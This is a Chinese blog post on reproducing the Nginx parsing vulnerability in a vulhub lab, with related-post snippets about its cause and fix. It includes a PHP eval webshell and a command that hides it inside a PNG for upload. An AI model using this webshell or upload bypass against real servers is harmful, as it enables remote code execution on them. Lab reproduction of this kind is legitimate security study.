Nginx解析漏洞

最新推荐文章于 2024-10-12 18:55:34 发布
最新推荐文章于 2024-10-12 18:55:34 发布
阅读量452 收藏 2
点赞数 5
文章标签: nginx 运维 服务器 安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_57379923/article/details/140895770
版权

一、基本信息

靶机:由 centos7 搭建的 vulhub,IP:192.168.100.40

二、攻击过程

进入 vulhub 靶场相关目录,并启动环境

cd master/nginx/nginx_parsing_vulnerability/
docker-compose up -d

浏览器验证 IP

制作 php 脚本(shell.php)

<?php @eval($_POST[“123”]); ?>

   

将脚本封装进 test.png 图片中,生成 shell.png

copy test.png/b+shell.php shell.png

上传脚本

解析成功

作 者:PeiyuJue
链 接: Nginx解析漏洞 – Candid Chronicles
来 源:Aaron的博客
版 权 声 明:本博客所有文章除特别声明外,均采用CC BY-NC-SA 4.0许可协议。文章版权归作者所有,未经允许请勿转载! 

Aaron_Jㅤ
关注
Nginx 解析漏洞复现及利用
Tauil的博客
07-20 7846
Nginx解析漏洞解析漏洞是PHPCGI的漏洞,在PHP的配置文件中有一个关键的选项cgi.fix_pathinfo默认开启,当URL中有不存在的文件,PHP就会向前递归解析在一个文件路径(/xx.jpg)后面加上/xx.php会将/xx.jpg解析为php文件。来上传我们的文件,很显然,不给上传,东西写进去文件被破坏了,被检验出不是正常的jpg不能上传了,可能有些朋友就成功了,因为第一次的时候我是可以的,现在应该是写的内容太多了,出了问题。phpeval($_POST["cmd"]);...
下列哪个是nginx解析漏洞解析为php的文件_phpStudy nginx解析漏洞预警通报
weixin_39613951的博客
11-23 607
大网安协【2020-59】近日,大连网络安全信息通报机制合作单位新华三集团(H3C)提醒,一个PHP调试环境的程序集成包phpStudy,Windows 版本存在nginx解析漏洞。1.漏洞综述1.1漏洞背景phpStudy是一个PHP调试环境的程序集成包,兼容Windows和Linux系统,支持Web端管理,可以一键创建网站、FTP、数据库等,实现了文件管理,PHP多版本共存及切...
Nginx 解析漏洞
qq_46081990的博客
05-28 1176
这是由于 Nginx 把以 .php 结尾的文件交给 fastcgi 处理,但 fastcgi 处理的时候发现并没有这个文件,于是 fastcgi 会继续向上查找,然后找到了上级文件 .jpg,于是就把 .jpg 当作 PHP 文件处理,导致漏洞产生。1、 将 php.ini 文件中的配置项 cgi.fix_pathinfo 的值设置为 0,这样 PHP 解析 webshell.jpg/1.php 这样的目录时,只要 1.php 不存在就会显示404页面。分析文件上传页面 index.php 源码。
Nginx解析漏洞复现
热门推荐
钟言的博客
01-28 1万+
本篇为Nginx解析漏洞复现,详细内容包含了搭建环境 复现过程 漏洞原理及防范同时包含了配置过程中出现的问题以及解决方案等等。
Nginx 解析漏洞复现
震山的博客
09-02 953
Nginx 解析漏洞复现和相关配置说明
nginx php解析漏洞,nginx解析漏洞利用
weixin_32950005的博客
03-28 616
nginx 0.7.65以下(0.5.*, 0.6.*, 0.7.*)全版本系列和0.8.37(0.8.*)以下8系列受影响。环境搭建:win2003+php+nginx0.7.641.修改php配置文件找到;extension=php_mysql.dll;extension=php_mysqli.dll前面指定了php的ext路径后,只要把需要的扩展包前面所对应的“;”去掉,就可以了。这里打开p...
Nginx解析漏洞~nginx_parsing漏洞分析
weixin_67832625的博客
08-11 304
这个解析漏洞其实是PHP CGI的漏洞,在PHP的配置文件中有一个关键的选项cgi.fix_pathinfo默认是开启的,当URL中有不存在的文件,PHP就会向前递归解析。在一个文件/xx.jpg后面加上/.php会将 /xx.jpg/xx.php 解析为 php 文件。
nginx解析漏洞复现
胖虎的博客
12-10 352
环境: centos7 docker vulhub 问题描述: 该漏洞nginx和php版本无关,属于用户配置不当造成的 上传文件地址/x.php 原因分析: 1、 由于nginx.conf的配置导致nginx把以’.php’结尾的文件交给fastcgi处理,为此可以构造http://your-ip/uploadfiles/图片名称/.php 2、但是fastcgi在处理’.php’文件时发现文件并不存在,这时php.ini配置文件中cgi.fix_pathinfo=1 发挥作用,这
phpStudy默认配置致Nginx解析漏洞
m0_48520508的博客
12-02 393
0x00介绍 phpStudy是一个PHP调试环境的程序集成包。该程序包集成最新的Apache+PHP+MySQL+phpMyAdmin+ZendOptimizer,一次性安装,无须配置即可使用,是非常方便、好用的PHP调试环境。 0x01漏洞概述 本次漏洞Nginx解析漏洞,由于phpstudy中配置文件的不当,造成了/xx.php解析漏洞,故此将文件解析为php运行。 0x02影响版本 phpstudy <= 8.1.0.7 0x03环境搭建 phpstudy8.1.0.7+windows2
Nginx解析漏洞测试
09-19
Nginx是一款高性能的web服务器,使用非常广泛,其不仅经常被用作...默认情况下可能导致服务器错误的将任何类型的文件以PHP的方式进行解析,这将导致严重的安全问题,使得恶意的攻击者可能攻陷支持php的nginx服务器
同城O2O系统源码与跑腿配送平台的架构设计与开发方案详解
meihusdk的博客
10-08 560
同城O2O系统与跑腿配送平台的开发,既是技术的挑战,也是商业机会的探索。通过合理的架构设计与清晰的开发方案,开发者可以构建出高效、稳定且易于扩展的平台,为用户提供更为便捷的服务。
Windows11下 安装 Docker部分疑难杂症(Unexpecter WSL error)
weixin_43752106的博客
10-09 401
不过docker还是跑不起来,因为docker需要wsl2才能运行,后面就看到说要把Ubuntu 的wsl版本设为2。装了大半天Docker desktop终于装好了,网上有的主流教程就不复述了,主要说一下网上没有的教程。这时候突然想起以前因为虚拟机Vmware有蓝屏的现象,关闭了一些虚拟机相关服务,于是 来到。网上看了很多文章,我都设置了,没用,后看到这篇文章,卧槽,居然跑成功了。虽然不知道原理,但ubuntu确实可以使用了,也能看到有Ubuntu了。(修好了,没复现,借张图)这个非常棘手。
在虚拟机里试用了几个linux操作系统
shencz2000的专栏
10-09 314
试了debian12,ubuntu20.4,ubuntu22.4,ubuntu24.4,deepin。其中ubuntu20.4使用时没有出现死机现象。在虚拟机里试用了几个操作系统。有时候出现死机现象,有的不能播放视频。有的显示效果不太好。虚拟机软件是VMware 17。
Linux内核与基础命令学习总结
helloworld工程师的博客
10-12 785
Linux操作系统Linux操作系统博大精深,其中对线程,IO,文件系统等概念的实现都很有借鉴意义。more​。
服务器数据恢复—EMC存储RAID5磁盘阵列数据恢复案例
beiya123的博客
10-12 211
服务器数据恢复环境: 一台EMC某型号存储设备,该存储中有一组由12块(包括2块热备盘)STAT硬盘组建的raid5阵列。 服务器故障: 该存储在运行过程中突然崩溃,raid瘫痪。数据恢复工程师到达现场对故障存储设备进行初检,发现raid中有两块硬盘掉线但只有一块热备盘成功激活,所以导致阵列瘫痪,上层lun无法使用。
2024 kali系统2024版本,可视化界面汉化教程(需要命令行更改),英文版切换为中文版,基于Debian创建的kali虚拟机
m0_47484034的博客
10-11 233
2024 kali系统2024版本,可视化界面汉化教程(需要命令行更改),英文版切换为中文版,基于Debian创建的kali
Dockerfile构建centos7镜像
2201_75556224的博客
10-12 565
step 1: 安装必要的一些系统工具# Step 2: 添加软件源信息# Step 3# Step 4: 更新并安装Docker-CE# Step 5: 开启Docker服务# Step 6: 开机自启Docker服务。
DC系列靶机-DC2
最新发布
2301_76717406的博客
10-12 678
rbash逃逸的时候要根据具体的情况选择合适的方法;git提权;对市面上常见的cms,要选择合适的工具,可以达到事半功倍的效果;hosts文件,且它的解析优先级比DNS更高,可以将目标主机ip地址和域名写入hosts文件;使用nmap扫描的时候,有时候处于安全考虑,会修改ssh服务的端口;
nginx中间件解析漏洞的影响
06-10
Nginx 中间件解析漏洞是指攻击者利用 Nginx 中间件解析漏洞,通过构造恶意请求,从而绕过服务器安全措施并执行任意代码。这种漏洞可以允许攻击者在服务器上执行任意的系统命令、读取、修改或删除服务器上的敏感...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

Aaron_Jㅤ

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值